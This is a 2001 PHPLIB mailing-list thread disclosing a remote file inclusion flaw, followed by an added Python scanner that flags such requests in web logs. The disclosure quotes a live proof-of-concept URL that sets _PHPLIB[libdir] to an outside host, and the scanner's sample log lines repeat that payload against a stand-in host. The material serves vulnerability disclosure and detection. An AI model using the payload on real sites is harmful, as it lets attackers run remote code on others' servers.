Re: [phplib-dev] have a nice weekend...
by Thies C. Arntzen
Jul 14 2001 12:15PM
On Sat, Jul 14, 2001 at 01:07:22PM +0200, giancarlo pinerolo wrote:
> I put my site down for now.
>
> have a nice weekend
>
> Giancarlo
> Date: Sat, 14 Jul 2001 12:54:23 +0200
> From: giancarlo pinerolo <giancarlo@[...].net>
> Organization: navigare.net
> X-Mailer: Mozilla 4.08 [en] (X11; I; Linux 2.2.12-20smp i686)
> To: Kristian Koehntopp <kris@[...].de>
> Subject: security in phplib: PLEASE READ!
>
> Hi Kristian
>
> Sorry to disturb you Saturday morning, but I found this tonight
> Please read the latest messages from me in phplib-dev and phpslash
> mailing list for an explanation
>
>
> If you're in a hurry, try this non-malicious URL, which could override
> all phplib code by including anything from the net
>
> http://phplib.netuse.de/showroom/index.php3?_PHPLIB%5Blibdir%5D=http://www.navigare.net/
ouch!
tc
>
> Ciao
>
> Giancarlo Pinerolo
>
>
> Kristian Koehntopp wrote:
> >
> > Giancarlo Pinerolo wrote:
> > > I really like phplib, and I'd like to help somehow. My skills are what
> > > they are: never had the time to learn C and am a self learned Linux
> > > user, although I used to code Assembler/370 for years, before I decided
> > > to throw my whole IBM mainframe skill out of the window and leave.
> >
> > Well, Boris does not do C, too. Does not keep him from hacking PHP3 code
> > I have difficulties to understand, though. Isn't there a rising demand
> > for /370 assembler people now that Y2K approaches? :-) (I would not
> > touch such a thing, or COBOL, for money... :-)
> >
> > > So for now the best thing I can think of is collecting a FAQ, even if my
> > > English is so&so.
> >
> > I am looking for someone willing to undertake such a project for the
> > last few weeks, but so far nobody volunteered. So if you want to do
> > this, just go ahead. I will provide a file upload system at
> > phplib.shonline.de as soon as I find time, so that you can maintain a
> > section of that site without going through me every time.
> >
> > > As of 'the future of PHPLIB', I really think that session management and
> > > object serialization is already a deep enough area to dig into. I
> > > realize that great things can be done here.
> >
> > Yes, but not with PHP. For the real thing I would have to abandon PHP
> > and go for apache itself, incorporating a shared memory manager
> > maintaining session state, database connections and the like
> > independently from all programming languages in a memory segment shared
> > by all Apache slave server processes. Programming languages like Perl
> > and PHP could plug into an Apache Server API to access this data just as
> > they access their local data. This would be more or less a direct copy of
> > the ASP system done with the means of the Unix/Apache combo.
> >
> > The other thing, an XML parser for PHP as part of the language and
> > accessible to PHP itself as well to PHP user functions is just as
> > pressing. I could do both, but not alone (Boris has left the company) and
> > not without the funding. At a university, this would be a
> > two-people-two-years project, but the company I work for would not
> > finance such an adventure...
> >
> > > For the rest, I went to the WDDX site when it came up in php3-list. I
> > > had already posed a question there about XML parsing, and someone
> > > pointed me to EXPAT.
> >
> > WDDX is important, but again, should be done within the Apache API so
> > that all programming languages that access the server state keeper can
> > either talk binary to the state keeper or call on this data as WDDX.
> > They could even insert binary into the state keeper and get it back as
> > WDDX, so they don't need to carry XML parsers around themselves, which I
> > think would be a great help for these language plugins...
> >
> > Kristian
> >
> > --
> > 15.11.1998: Kristian Koehntopp, Knooper Weg 46, 24105 Kiel
> > "Q: What's tiny and yellow and very, very, dangerous?
> > A: A canary with the super-user password."
> > -- stolen from chuck@[...].com (Chuck Mead)
>
>
> --
> Unsubscribe by mail to: phplib-dev-unsubscribe@[...].de
> Command list by mail to: phplib-dev-help@[...].de
--
Unsubscribe by mail to: phplib-dev-unsubscribe@[...].de
Command list by mail to: phplib-dev-help@lists.netuse.de
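
A defender's log check for requests shaped like the URL quoted in the message above, added here as an example that is not part of the original post or of PHPLIB: it flags any query parameter named `_PHPLIB[...]` and rates it higher when the value is a remote URL. The Apache-style log format, the sample lines, the hosts and the severity labels are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names shaped like _PHPLIB[key], as in the URL quoted in the message.
PHPLIB_PARAM = re.compile(r"^_PHPLIB\[([^\]]*)\]$")
# Values that name a remote resource (scheme://...).
REMOTE_VALUE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# Request line inside an Apache-style access log entry (format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses and hosts are documentation values.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jul/2001:12:01:00 +0200] "GET /showroom/index.php3 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [14/Jul/2001:12:02:10 +0200] '
    '"GET /showroom/index.php3?_PHPLIB%5Blibdir%5D=http://remote.example/ HTTP/1.0" 200 312',
    '192.0.2.45 - - [14/Jul/2001:12:03:30 +0200] '
    '"GET /showroom/index.php3?page=2&_PHPLIB[libdir]=/tmp/ HTTP/1.0" 200 298',
    '192.0.2.46 - - [14/Jul/2001:12:04:05 +0200] '
    '"GET /search.php3?q=_PHPLIB%5Blibdir%5D HTTP/1.0" 200 1024',
]


def inspect_target(target):
    """Return (key, value, is_remote) for each _PHPLIB[...] query parameter."""
    hits = []
    # parse_qsl percent-decodes names and values, so %5B/%5D become [ and ].
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        match = PHPLIB_PARAM.match(name)
        if match:
            hits.append((match.group(1), value, bool(REMOTE_VALUE.match(value))))
    return hits


def scan_log(lines):
    """Flag log entries that set a _PHPLIB[...] parameter; remote values rate 'high'."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        request = REQUEST.search(line)
        if not request:
            continue
        for key, value, remote in inspect_target(request.group(1)):
            findings.append({"line": lineno, "key": key, "value": value,
                             "severity": "high" if remote else "review"})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The last sample line is not flagged because `_PHPLIB[libdir]` appears there only as the value of `q`, not as a parameter name.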